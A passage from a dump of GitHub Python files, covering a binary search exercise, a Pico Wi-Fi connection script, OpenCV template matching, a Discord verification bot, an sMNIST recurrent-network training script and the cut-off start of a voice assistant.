run(suite)\n","repo_name":"IronLanguages/ironclad","sub_path":"tests/stringtest.py","file_name":"stringtest.py","file_ext":"py","file_size_in_byte":25409,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"67"}
+{"seq_id":"71962274133","text":"# My solution\ndef binary_search(element, some_list, start_index=0, end_index=None):\n    # If end_index is not given, default to the last index of the list\n    if end_index == None:\n        end_index = len(some_list) - 1\n\n    # Write your code here.\n    midpoint = (start_index + end_index) // 2\n    if start_index > end_index:\n        return None\n    if some_list[midpoint] == element:\n        return midpoint\n    elif some_list[midpoint] > element:\n        return binary_search(element, some_list[:midpoint])\n    elif some_list[midpoint] < element:\n        # The recursive call returns None when the element is missing from the right half;\n        # adding None to an int raises a TypeError, so guard for it explicitly\n        result = binary_search(element, some_list[midpoint+1:])\n        return None if result is None else midpoint + 1 + result\n\nprint(binary_search(2, [2, 3, 5, 7, 11]))\nprint(binary_search(0, [2, 3, 5, 7, 11]))\nprint(binary_search(5, [2, 3, 5, 7, 11]))\nprint(binary_search(3, [2, 3, 5, 7, 11]))\nprint(binary_search(11, [2, 3, 5, 7, 11]))\n\n# My solution slices the list itself before each recursive call and adds the index offsets back on the way up,\n# whereas the official solution passes start_index and end_index directly and never stores separate index values.\n\n# Official answer\n\ndef binary_search(element, some_list, start_index=0, end_index=None):\n    # If end_index is not given, default to the last index of the list\n    if end_index == None:\n        end_index = len(some_list) - 1\n\n    # If start_index is greater than end_index, element is not in some_list\n    if start_index > end_index:\n        return None\n\n    # Find the middle index of the range\n    mid = (start_index + end_index) // 2\n\n    # Check whether the value at this index is the one we are looking for\n    if some_list[mid] == element:\n        return mid\n\n    # If the target is smaller than the middle value, search the left half of the list\n    if element < some_list[mid]:\n        return binary_search(element, some_list, start_index, mid - 1)\n\n    # If the target is larger than the middle value, search the right half of the list\n    else:\n        return binary_search(element, some_list, mid + 1, end_index)\n\n\nprint(binary_search(2, [2, 3, 5, 7, 11]))\nprint(binary_search(0, [2, 3, 5, 7, 11]))\nprint(binary_search(5, [2, 3, 5, 7, 11]))\nprint(binary_search(3, [2, 3, 5, 7, 11]))\nprint(binary_search(11, [2, 3, 5, 7, 
11]))","repo_name":"OhJeongHo/Python_algorithm_study","sub_path":"알고리즘/07. 이진탐색 재귀로 구현하기.py","file_name":"07. 이진탐색 재귀로 구현하기.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"7101972981","text":"import machine  # needed for machine.Pin below; missing from the original imports\nimport network\nimport rp2\nimport time\nimport socket\n\n\nrp2.country(\"CN\")\nwlan=network.WLAN(network.STA_IF)\nwlan.active(True)\nprint(wlan.scan())\n\n\nssid=\"Schubert\"\npw=\"xinxianshuo\"\nhost=\"10.0.0.1\"\nport=\"55551\"\n\n\ndef light_onboard_led(led_flag):\n    led=machine.Pin(\"LED\",machine.Pin.OUT)\n    if led_flag==1:\n        led.on()\n    elif led_flag==0:\n        led.off()\n\ndef connect():\n    wlan.connect(ssid,pw)\n    timeout=10\n    while timeout>0:\n        if wlan.status()>=3:\n            light_onboard_led(1)\n            print(\"connected to WIFI SSID: Schubert\")\n            return 0\n        timeout -=1\n        print(\"waiting for connection to [Schubert]\")\n        time.sleep(1)\n    light_onboard_led(0)\n    print(\"connection failed\")\n\nconnect()\n\n","repo_name":"anduinriver/pico-pilot","sub_path":"wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"19043143909","text":"# -*- coding: UTF-8 -*-\nimport math\n\nimport cv2\nimport numpy as np\n\nfrom tools.DecoratorTools import calculate_time\nfrom tools.ImageOperate import clahe_equalize\n\n\ndef compute_overlap(x1, y1, w1, h1, x2, y2, w2, h2):\n\t# Areas of the two rectangles\n\tarea1 = w1 * h1\n\tarea2 = w2 * h2\n\t# Coordinates of the intersection\n\tx_inter = max(x1, x2)\n\ty_inter = max(y1, y2)\n\tw_inter = min(x1 + w1, x2 + w2) - x_inter\n\th_inter = min(y1 + h1, y2 + h2) - y_inter\n\t# Area of the intersection\n\tif w_inter <= 0 or h_inter <= 0:\n\t\treturn 0.0\n\tarea_inter = w_inter * h_inter\n\t# Area of the union\n\tarea_union = area1 + area2 - area_inter\n\t# Overlap ratio (intersection over union)\n\toverlap = area_inter / area_union\n\treturn overlap\n\n\ndef rotate_and_scale(image, angle, scale):\n\t\"\"\"\n\tRotate and scale the image\n\t:param image: input image\n\t:param angle: rotation angle in degrees\n\t:param scale: scaling factor\n\t:return:\n\t\"\"\"\n\timg_resized = cv2.resize(image, (int(scale * image.shape[1]), int(scale * image.shape[0])))\n\trows, cols = img_resized.shape[:2]\n\t# Build the rotation matrix\n\tM = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)\n\t# Compute the bounding canvas: angle is in degrees, so convert to radians first,\n\t# and take absolute values so the new size stays positive for any angle\n\t# (the original mixed degrees into math.cos/math.sin, which expect radians)\n\ttheta = math.radians(angle)\n\tcols_new = int(abs(cols * math.cos(theta)) + abs(rows * math.sin(theta)))\n\trows_new = int(abs(cols * math.sin(theta)) + abs(rows * math.cos(theta)))\n\t# Apply the rotation\n\timg_rotated = cv2.warpAffine(img_resized, M, (cols_new, rows_new))\n\treturn img_rotated\n\n\n@calculate_time\ndef template_match_multi(image, template, angle_step: int = 30, scale_start: float = 0.5, scale_stop: float = 1.0, scale_step: float = 0.2, similarity_threshold: float = 1.0, overlap_threshold=0.3):\n\t\"\"\"\n\t:param image:\n\t:param template:\n\t:param angle_step: rotation step in degrees\n\t:param scale_start: scale sweep start\n\t:param scale_stop: scale sweep stop\n\t:param scale_step: scale sweep step\n\t:param similarity_threshold: similarity threshold\n\t:param overlap_threshold: overlap threshold\n\t:return:\n\t\"\"\"\n\t# Size of the template image\n\tth, tw = template.shape[:2]\n\t# Initialize the list of candidate matches (position, score, angle, scale)\n\tmatches = []\n\t# Indices of the detection boxes to keep\n\t# Sweep rotations and scales over the given ranges and compute similarity for each variant\n\tfor angle in range(0, 360, angle_step):\n\t\tfor scale in np.arange(scale_start, scale_stop, scale_step):\n\t\t\t# Rotate and scale the template\n\t\t\ttemplate_rotated = rotate_and_scale(template, angle, scale)\n\t\t\t# Compute similarity\n\t\t\tresult = cv2.matchTemplate(image, template_rotated, cv2.TM_CCOEFF_NORMED)\n\t\t\t# Find all match locations within the threshold\n\t\t\tlocs = np.where(result <= similarity_threshold * result.min())\n\t\t\t# Store the match results in the matches list\n\t\t\tfor pt in 
zip(*locs):\n\t\t\t\tmatches.append([pt, result[pt[0], pt[1]], angle, scale])\n\t\n\t# Sort matches by score, best first (ascending: with the min-based threshold above, lower scores are better)\n\tmatches = sorted(matches, key=lambda x: x[1], reverse=False)\n\t\n\t# Take the best-scoring detection box\n\tmax_loc = matches[0][0]\n\tcv2.rectangle(image, (max_loc[1], max_loc[0]), (max_loc[1] + tw, max_loc[0] + th), (0, 0, 255), 2)\n\t\n\t# Walk the matches list and draw the boxes that meet the overlap requirement\n\tfor match in matches:\n\t\tpt = match[0]\n\t\toverlap = compute_overlap(max_loc[1], max_loc[0], tw, th, pt[1], pt[0], tw, th)\n\t\tif overlap <= overlap_threshold:\n\t\t\tcv2.rectangle(image, (pt[1], pt[0]), (pt[1] + tw, pt[0] + th), (0, 0, 255), 2)\n\t\n\treturn image\n\n\ndef template_match_sift(image, template, threshold=0.75, draw_result=True):\n\t\"\"\"\n\t:param image:\n\t:param template:\n\t:param threshold:\n\t:param draw_result:\n\t:return:\n\t\"\"\"\n\t\n\t# Convert images to grayscale\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tgray_template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n\t\n\t# Initialize SIFT detector and FLANN matcher\n\tsift = cv2.xfeatures2d.SIFT_create()\n\tmatcher = cv2.FlannBasedMatcher_create()\n\t\n\t# Extract key_points and descriptors from template and image\n\tkey_points_template, descriptors_template = sift.detectAndCompute(gray_template, None)\n\tkey_points_image, descriptors_image = sift.detectAndCompute(gray_image, None)\n\t\n\t# Match descriptors using FLANN matcher\n\tmatches = matcher.knnMatch(descriptors_template, descriptors_image, k=2)\n\t\n\t# Filter matches by Lowe's ratio test\n\tgood_matches = []\n\tfor m, n in matches:\n\t\tif m.distance < 0.4 * n.distance:\n\t\t\tgood_matches.append(m)\n\t\n\t# Compute homography matrix using RANSAC algorithm\n\tsrc_pts = np.float32([key_points_template[m.queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)\n\tdst_pts = np.float32([key_points_image[m.trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)\n\tM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\t\n\t# Apply perspective transform to template\n\th, w = template.shape[:2]\n\ttemplate_warped = cv2.warpPerspective(template, M, (w, h))\n\t\n\t# Match warped template to image using normalized cross-correlation\n\tresult = cv2.matchTemplate(gray_image, cv2.cvtColor(template_warped, cv2.COLOR_BGR2GRAY), cv2.TM_CCOEFF_NORMED)\n\t\n\t# Find locations of matched regions above threshold\n\tlocations = np.where(result >= threshold)\n\tlocations = list(zip(*locations[::-1]))\n\t\n\t# Draw bounding boxes around matched regions\n\tif draw_result:\n\t\tfor pt in locations:\n\t\t\tcv2.rectangle(image, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)\n\t\n\treturn image, locations\n\n\n# Read the target image and the template image\ntarget_img = cv2.imread(r\"D:\\fy.xie\\fenx\\fenx - General\\Ubei\\Test_Label1\\Defect_008.png\")\ntemplate_img = cv2.imread(r\"D:\\fy.xie\\fenx\\fenx - General\\Ubei\\Test_Label1\\template.png\")\ntarget_img = clahe_equalize(target_img)\nimg = template_match_multi(target_img, template_img, 180, 0.5, 1.0, 0.2, 1.0, 0.1)\n# img,_ = template_match_sift(target_img, template_img)\ncv2.namedWindow(\"Barcode Detection\", cv2.WINDOW_NORMAL)\n\ncv2.imshow(\"Barcode Detection\", img)\nif cv2.waitKey(0) == 27:\n\tcv2.destroyAllWindows()\n","repo_name":"VanceXie/codeScan","sub_path":"location/Ineffective/templeMatch_Ineffective.py","file_name":"templeMatch_Ineffective.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"43731891207","text":"import discord\nimport os\nimport random\nimport 
asyncio\nfrom discord.ext.commands import Bot\nimport keep_alive\nfrom discord.utils import get\n\ntoken = os.environ.get('BOT_TOKEN')\nbot = discord.Client()\n\n@bot.event\nasync def on_message(message):\n if(message.content == \"!verify\"):\n guild = message.guild\n embed = discord.Embed(title=\"Verification\", description=\"A new channel has been created for your verification. Welcome!\", color=0xFF5733)\n await message.channel.send(embed=embed)\n rand = random.randint(1000, 9999)\n global channelname\n channelname = \"user-\" + str(rand)\n global verify_role\n verify_role = await guild.create_role(name = channelname)\n global verified\n verified = get(guild.roles, name=\"Verified\")\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(read_messages = False),\n verified: discord.PermissionOverwrite(read_messages = False),\n verify_role: discord.PermissionOverwrite(read_messages = True)\n }\n channel = await guild.create_text_channel(channelname, overwrites=overwrites)\n global channelid\n channelid = channel.id\n embed = discord.Embed(title=\"Verification\", description=\"Please enter your Minecraft username to verify yourself.\", color=0xFF5733)\n await channel.send(embed=embed)\n await message.author.add_roles(verify_role)\n if message.author.id != 894761300880662528 and \"user\" in message.channel.name:\n guild = message.author.guild\n await message.author.add_roles(get(guild.roles, name=\"Verified\"))\n channel = bot.get_channel(message.channel.id)\n verify_role = get(guild.roles, name=message.channel.name)\n await channel.delete()\n await verify_role.delete()\n name_role = await guild.create_role(name = message.content)\n await message.author.add_roles(name_role)\n\nbot.run(token)\n","repo_name":"IPMElite/VerificationBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74648463254","text":"from collections import deque\n\ndef solution(participant, completion):\n participant = deque(sorted(participant))\n completion = deque(sorted(completion))\n \n while participant:\n now = participant.popleft()\n if completion and now == completion.popleft():\n continue\n else:\n return now","repo_name":"unhhyyeexx/ProblemSolving","sub_path":"프로그래머스/lv1/42576. 
완주하지 못한 선수/완주하지 못한 선수.py","file_name":"완주하지 못한 선수.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32802951141","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision as T\nimport numpy as np\nimport pickle\nimport argparse\nimport time\nimport os\nimport datetime\n\nworking_dir = os.path.dirname(os.path.realpath(__file__))\n\nfrom NetworkCreation.common import henaff_init, cayley_init, random_orthogonal_init\nfrom NetworkCreation.Networks import ARUN, RNN, LSTM, GRU\nfrom Training.training_utils import LocalTransform, SinTransform, StepTransform\nfrom torch._utils import _accumulate\nfrom torch.utils.data import Subset\n\nparser = argparse.ArgumentParser(description='(p)sMNIST task')\nparser.add_argument('-g', '--cuda', action='store_true', default=False,\n help='Use CUDA')\nparser.add_argument('-p', '--permute', action='store_true', default=False, \n help='permute the order of sMNIST')\nparser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Print details')\n\nparser.add_argument('--gain', type=float, default=1.0, \n help='degree of nonlinearity at initialization')\nparser.add_argument('--saturation', type=float, default=1.0, \n help='degree of saturation at initialization')\nparser.add_argument('--random', action='store_true', default=True, \n help='random shape parameters initialization')\nparser.add_argument('--learn_params', action='store_true', default=True,\n help='learn the shape parameters')\nparser.add_argument('--nonlin', type=str, default='gamma2', \n choices=['gamma','gamma2','ReLU'],\n help='Nonlinearity for RNN.')\nparser.add_argument('--net-type', type=str, default='RNN',\n choices=['ANRU', 'RNN', 'LSTM', 'GRU'],\n help='Type of recurrent neural net.')\nparser.add_argument('--nhid', type=int, default=400, \n help='hidden size of recurrent net')\nparser.add_argument('--lr', type=float, default=1e-4,\n help='initial learning rate')\n\nparser.add_argument('--save-freq', type=int, default=25, \n help='frequency (in epochs) to save data')\nparser.add_argument('--seed', type=int, default=400, \n help='random seed for reproducibility')\nparser.add_argument('--rinit', type=str, default=\"henaff\", \n help='recurrent weight matrix initialization')\nparser.add_argument('--iinit', type=str, default=\"kaiming\", \n help='input weight matrix initialization')\nparser.add_argument('--batch', type=int, default=100,\n help='batch size')\nparser.add_argument('--note', type=str, default='',\n help='Any details to be entered manually upon launch')\nparser.add_argument('--test', action='store_true', default=False,\n help='Test model, no training.')\n\nparser.add_argument('--transform', type=str, default='sin',\n help='Transform to be applied on test set')\nparser.add_argument('--transform-ratio', type=float, default=0.0,\n help='Ratio of dataset to apply sin transform on inputs.')\nargs = parser.parse_args()\n\nCUDA = args.cuda\nSAVEFREQ = args.save_freq\nn, s = args.gain, args.saturation\n\n# Set the random seed manually for reproducibility.\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\ntorch.cuda.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not CUDA:\n print(\"WARNING: You have a CUDA device, so you should probably run with -g,--cuda. 
Enabling CUDA.\")\n        CUDA = True\ndevice = torch.device(\"cuda\" if CUDA else \"cpu\")\n\n\n###############################################################################\n# Load MNIST data\n###############################################################################\n\nif __name__ == \"__main__\":\n    rng = np.random.RandomState(args.seed)\n    if args.permute:\n        task = 'psMNIST'\n        order = rng.permutation(784)\n    else:\n        task = 'sMNIST'\n        order = np.arange(784)\n\n    trainset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=True, download=True, transform=T.transforms.ToTensor())\n    valset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=True, download=True, transform=T.transforms.ToTensor())\n    offset = 10000\n\n    R = rng.permutation(len(trainset))\n    lengths = (len(trainset) - offset, offset)\n    trainset, valset = [Subset(trainset, R[offset - length:offset]) for offset, length in\n                        zip(_accumulate(lengths), lengths)]\n    testset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=False, download=True, transform=T.transforms.ToTensor())\n    trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch, shuffle=False, num_workers=2)\n    valloader = torch.utils.data.DataLoader(valset, batch_size=args.batch, shuffle=False, num_workers=2)\n    testloader = torch.utils.data.DataLoader(testset, batch_size=args.batch, num_workers=2)\n\n\n###############################################################################\n# Saving\n###############################################################################\n\nif __name__ == \"__main__\":\n    # was: if args.nonlin is not ('gamma' or 'gamma2'), which short-circuits to 'gamma'\n    # and misuses identity comparison; membership testing is what was intended\n    if args.nonlin not in ('gamma', 'gamma2'):\n        args.learn_params = False\n\n    if args.net_type=='RNN':\n        udir = f'{args.net_type}_lr{args.lr}_p{args.transform_ratio}_hs{args.nhid}_{args.nonlin}'\n    else:\n        udir = f'{args.net_type}_lr{args.lr}_p{args.transform_ratio}_hs{args.nhid}'\n    exp_time = \"{0:%Y-%m-%d}_{0:%H-%M-%S}\".format(datetime.datetime.now())\n    SAVEDIR = os.path.join('./Training/SavedModels',\n                           task,\n                           str(args.seed),\n                           udir,\n                           str(datetime.date.today()))\n    # Savedir is of type: ./Training/SavedModels/psMNIST/400/ARUN_lr0.0001_p0.0_hs400/2020-01-02/\n\n    if not args.test:\n        # Considering args.verbose runs as just debugging, so allowing overwriting.\n        if args.verbose: SAVEDIR+='--X'\n        # Else\n        if not os.path.exists(SAVEDIR):\n            os.makedirs(SAVEDIR)\n        elif not args.verbose:\n            SAVEDIR += '--0'\n            try:\n                os.makedirs(SAVEDIR)\n            except FileExistsError:\n                SAVEDIR = SAVEDIR[:-1]+str(int(SAVEDIR[-1])+1)\n                os.makedirs(SAVEDIR)\n\n        LOGFILE = os.path.join(SAVEDIR, 'logfile.txt')\n        LOGTEST = os.path.join(SAVEDIR, 'test_results.txt')\n        with open(LOGFILE, 'w') as fp:\n            '''Details and hyperparameters, if desired'''\n            fp.write(f'{task} task on {datetime.datetime.now()}\\n')\n            fp.write(f'\\nSaving to: {SAVEDIR}')\n            if args.note!='':\n                fp.write(f'\\nNote : {args.note}')\n            \n            fp.write('\\n\\nHyperparameters: ')\n            for key, val in args.__dict__.items():\n                fp.write(('{}: {}, '.format(key, val)))\n\n        with open(LOGTEST, 'w') as fp:\n            fp.write('Testing data.')\n            fp.write('\\n\\nTest => accuracy on original testing set\\nTest T. => accuracy on testing set with SinTransform(freq=1, phase=0, amplitude=0.5)')\n            fp.write('\\n\\n'+'='*50+'\\n Epoch Test Test T. 
\\n'+'='*50)\n\n\n###############################################################################\n# Define the model\n###############################################################################\n\n\nclass Model(nn.Module):\n def __init__(self, hidden_size, rnn):\n super(Model, self).__init__()\n self.hidden_size = hidden_size\n\n # Modules\n self.lin = nn.Linear(hidden_size, 10)\n self.rnn = rnn\n\n self.loss_func = nn.CrossEntropyLoss()\n\n def forward(self, inputs, y, order, \n transform=None, return_ns=False, external_drive=None):\n h_net0, h_net1, a = None, None, None\n hiddens, shape_signals, pre_activations = [], [], []\n\n inputs = inputs[:, order] # permute inputs\n\n for i, input in enumerate(torch.unbind(inputs, dim=1)):\n x = input.unsqueeze(1)\n if transform is not None:\n x = transform(i, x)\n\n if external_drive is None:\n shift = 0.0\n else:\n shift = external_drive.get_factor(i)-1\n \n h_net0 = self.rnn(x, h_net0, external_drive=shift)\n\n for temp in [h_net0, h_net1]:\n if temp is not None and temp.requires_grad: \n temp.retain_grad()\n\n # if return_ns:\n # if args.net_type=='ARUN': \n # shape_signals.append(shape_parameters)\n # pre_activations.append(pre_activs.cpu().detach().numpy())\n # hiddens.append(h_net0.cpu().detach().numpy())\n\n out = self.lin(h_net0) # decode\n loss = self.loss_func(out, y)\n preds = torch.argmax(out, dim=1)\n correct = torch.eq(preds, y).sum().item()\n return loss, correct, hiddens\n\n # if transform is not None: suffix = '_T'\n # elif external_drive is not None: suffix='_D'\n # else: suffix+''\n \n # shape_signals_label = 'shapesignals'+suffix+'.npy'\n # hiddens_label = 'net0_hiddenstates'+suffix+'.npy'\n # preactivs_label = 'net0_preactivations'+suffix+'.npy'\n\n # if return_ns: \n # if args.net_type=='ARUN': \n # np.save(os.path.join(MODELDIR, shape_signals_label), shape_signals)\n # np.save(os.path.join(MODELDIR, preactivs_label), pre_activations)\n # np.save(os.path.join(MODELDIR, hiddens_label), hiddens)\n\n\ndef test_model(net, dataloader, transform=None, return_parameters=False, external_drive=None):\n accuracy = 0\n loss = 0\n net.eval()\n with torch.no_grad():\n for i, data in enumerate(dataloader):\n\n x, y = data\n x = x.view(-1, 784)\n if CUDA:\n x = x.cuda()\n y = y.cuda()\n if args.net_type == 'LSTM' or args.net_type == 'ARUN':\n net.rnn.init_states(x.shape[0])\n loss, c, _ = net.forward(x, y, order, transform=transform, return_ns=False, external_drive=external_drive)\n if args.verbose:\n if i%10==0: print(f'Step {i}, Loss: {loss.item()}')\n accuracy += c\n\n accuracy /= len(testset)\n return loss, accuracy\n\n\ndef save_checkpoint(state, fname):\n filename = os.path.join(SAVEDIR, fname)\n torch.save(state, filename)\n\ndef train_model(net, optimizer, scheduler, num_epochs):\n with open(LOGFILE, 'a') as fp:\n fp.write('\\n\\n'+'-'*70+'\\nBeginning of training.')\n fp.write('\\n\\nTrain => accuracy on training set \\nVal => accuracy on original validation set.\\nVal T. => accuracy on validation set with sinuisoidal transform')\n fp.write('\\n\\n'+'='*45+'\\n Epoch Time Train Val Val T. 
\\n'+'='*45)\n\n with open(os.path.join(SAVEDIR, 'training_loss_details.txt'), 'w') as fp:\n fp.write('Loss details:\\n')\n\n train_losses, train_accuracies = [], []\n val_losses, val_accuracies = [], []\n val_losses_T, val_accuracies_T = [], []\n save_norms = []\n shape_params = []\n\n best_val_acc = 0\n ta = 0\n for epoch in range(recover, recover+num_epochs):\n s_t = time.time()\n accs = []\n losses = []\n norms = []\n processed = 0\n net.train()\n correct = 0\n\n ts = np.random.binomial(1, args.transform_ratio, size=[500])\n for i, data in enumerate(trainloader, 0):\n inp_x, inp_y = data\n inp_x = inp_x.view(-1, 784)\n if bool(ts[i]):\n trans1 = SinTransform(freq=np.random.uniform(0,2), phase=0, amplitude=0.2)\n else:\n trans1 = None\n\n if CUDA:\n inp_x = inp_x.cuda()\n inp_y = inp_y.cuda()\n if args.net_type == 'LSTM' or args.net_type=='ARUN':\n net.rnn.init_states(inp_x.shape[0])\n\n optimizer.zero_grad()\n\n loss, c, _ = net.forward(inp_x, inp_y, order, transform=trans1)\n correct += c\n processed += inp_x.shape[0]\n\n accs.append(correct / float(processed))\n\n loss.backward()\n if args.verbose:\n if i%10==0: print(f'Step {i}, Loss: {loss.item()}')\n losses.append(loss.item())\n\n if np.isnan(loss.item()):\n raise ValueError\n\n optimizer.step()\n if i%50==0:\n with open(os.path.join(SAVEDIR, 'training_loss_details.txt'), 'a') as fp:\n fp.write('{:3.0f} Loss = {:5.8f}\\n'.format(i, loss.item()))\n\n norm = torch.nn.utils.clip_grad_norm_(net.parameters(), 'inf')\n norms.append(norm)\n\n # Validation\n val_loss, val_acc = test_model(net, valloader, transform=None)\n val_accuracies.append(val_acc)\n val_losses.append(val_loss)\n \n scheduler.step(val_loss) # lr scheduler based on validation loss\n\n # Validation on transformed set\n trans2 = SinTransform(freq=np.random.uniform(0,2), phase=0, amplitude=0.5)\n val_loss_T, val_acc_T = test_model(net, valloader, transform=trans2)\n val_accuracies_T.append(val_acc_T)\n val_losses_T.append(val_loss_T)\n\n with open(LOGFILE, 'a') as fp:\n fp.write('\\n {:3.0f} {} {:2.5f} {:2.5f} {:2.5f}'.\n format(epoch + 1, str(datetime.timedelta(seconds=int(time.time() - s_t))), \n np.mean(accs), val_acc, val_acc_T))\n\n train_losses.append(np.mean(losses))\n train_accuracies.append(np.mean(accs))\n save_norms.append(np.mean(norms))\n\n # Save data\n if epoch % 2 == 0 or epoch == num_epochs - 1:\n with open(os.path.join(SAVEDIR, 'Train_Losses'), 'wb') as fp:\n pickle.dump(train_losses, fp)\n with open(os.path.join(SAVEDIR, 'Val_Losses'), 'wb') as fp:\n pickle.dump(val_losses, fp)\n\n with open(os.path.join(SAVEDIR, 'Train_Accuracy'), 'wb') as fp:\n pickle.dump(train_accuracies, fp)\n with open(os.path.join(SAVEDIR, 'Val_Accuracy'), 'wb') as fp:\n pickle.dump(val_accuracies, fp)\n\n with open(os.path.join(SAVEDIR, 'Grad_Norms'), 'wb') as fp:\n pickle.dump(save_norms, fp)\n\n with open(os.path.join(SAVEDIR, 'val_Accuracy_T'), 'wb') as fp:\n pickle.dump(val_accuracies_T, fp)\n with open(os.path.join(SAVEDIR, 'val_Losses_T'), 'wb') as fp:\n pickle.dump(val_losses_T, fp)\n\n\n if epoch % SAVEFREQ == 0 or epoch == num_epochs - 1:\n save_checkpoint({\n 'state_dict': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': epoch\n },\n 'e_{}.pth.tar'.format(epoch)\n )\n \n _, test_acc = test_model(net, testloader, transform=None)\n _, test_T_acc = test_model(net, testloader, transform=SinTransform(freq=1, phase=0, amplitude=0.5))\n with open(LOGTEST, 'a') as fp:\n fp.write('\\n {:3.0f} {:2.6f} {:2.6f}'.format(epoch, test_acc, test_T_acc))\n\n 
return\n\n\n###############################################################################\n# Training\n###############################################################################\n\ninp_size = 1\n\nif __name__ == \"__main__\":\n if args.net_type == 'ARUN':\n rnn = ARUN(inp_size, main_hidden_size=args.nhid, supervisor_hidden_size=50, cuda=CUDA,\n r_initializer=args.rinit, i_initializer=args.iinit, adaptation_type='heterogeneous', verbose=args.verbose)\n elif args.net_type == 'RNN':\n if args.random:\n n0 = 5+2*torch.rand(1); s0 = 0.0\n else:\n n0, s0 = args.gain, args.saturation\n rnn = RNN(inp_size, args.nhid, bias=True, nonlin=args.nonlin, cuda=CUDA, n_init=n0, s_init=s0,\n r_initializer=args.rinit, i_initializer=args.iinit, learn_params=args.learn_params)\n elif args.net_type == 'LSTM':\n rnn = LSTM(inp_size, args.nhid, cuda=CUDA)\n elif args.net_type == 'GRU':\n rnn = GRU(inp_size, args.nhid, cuda=CUDA)\n else:\n print('Net-type unrecognised. Using default: RNN')\n \n # set training modules\n net = Model(args.nhid, rnn)\n optimizer = optim.Adam(net.parameters(), lr=args.lr)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') \n\n if args.verbose:\n print('\\nNumber of trainable parameters:')\n total_params = 0\n for name, parameter in net.named_parameters():\n if not parameter.requires_grad: continue\n param = parameter.numel()\n total_params+=param\n print(name, param)\n print('-> Total: {:6.0f} ({:3.1f}K)\\n'.format(total_params, total_params/1000))\n\n if CUDA:\n net = net.cuda()\n\n epoch = 0\n recover = 0\n #recover_date = '2021-02-12'\n epoch = recover\n num_epochs = 100 - recover \n\n if recover > 0: \n # Recover a pretrained model + continue training\n MODELDIR = os.path.join('./Training/SavedModels', task, str(args.seed), udir, recover_date)\n last_model = torch.load(os.path.join(MODELDIR, f'e_{recover}.pth.tar'))\n net.load_state_dict(last_model['state_dict'])\n print(f'Recovered: NET={args.net_type}, lr={args.lr}, p={args.transform_ratio}, epoch={recover}')\n\n if not args.test:\n try:\n train_model(net, optimizer, scheduler, num_epochs)\n except ValueError:\n with open(LOGFILE, 'a') as fp:\n fp.write(\"\\n\"+\"*\"*70+\"\\nNan loss encountered, program terminated.\")\n except KeyboardInterrupt:\n with open(LOGFILE, 'a') as fp:\n fp.write(\"\\n\"+\"*\"*70+\"\\nExited from training early\")\n else:\n '''\n Equivalent to: if args.test. 
Recover a pre-trained model.\n '''\n # set the following yourself\n recover = 50 \n recover_date = '2021-02-07--1'\n\n MODELDIR = os.path.join('./Training/SavedModels', task, str(args.seed), udir, recover_date)\n\n last_model = torch.load(os.path.join(MODELDIR, f'e_{recover}.pth.tar'))\n net.load_state_dict(last_model['state_dict'])\n print(f'Recovered: NET={args.net_type}, lr={args.lr}, p={args.transform_ratio}, epoch={recover}')\n\n start_time = time.time()\n test_loss, test_acc = test_model(net, testloader, transform=None, return_parameters=True)\n print('\\nOriginal:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_loss, test_acc))\n\n test_T_loss, test_T_acc = test_model(net, testloader, transform=SinTransform(freq=1, phase=0, amplitude=0.5), return_parameters=True)\n print('\\nTransformed:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_T_loss, test_T_acc))\n\n test_D_loss, test_D_acc = test_model(net, testloader, external_drive=StepTransform(step_size=1.0, step_length=200, step_position=200), return_parameters=True)\n print('\\nExternal drive:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_D_loss, test_D_acc)) \n print('\\nTime:', time.time() - start_time)\n","repo_name":"vgeadah/NonlinMod","sub_path":"sMNIST_task.py","file_name":"sMNIST_task.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"41693328515","text":"import speech_recognition as sr\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nimport googlemaps\n\n# Initialize the recognizer\nrecognizer = sr.Recognizer()\n\n# Initialize the Google Maps API client (you'll need an API key)\ngmaps = googlemaps.Client(key='YOUR_API_KEY')\n\n# Function to capture voice input and convert it to text\ndef get_voice_input():\n with sr.Microphone() as source:\n print(\"Listening...\")\n try:\n audio = recognizer.listen(source, timeout=5)\n text = recognizer.recognize_google(audio)\n return text\n except sr.WaitTimeoutError:\n return \"Timeout: No speech detected.\"\n except sr.UnknownValueError:\n return \"Sorry, I could not understand what you said.\"\n except sr.RequestError as e:\n return f\"Error with the speech recognition 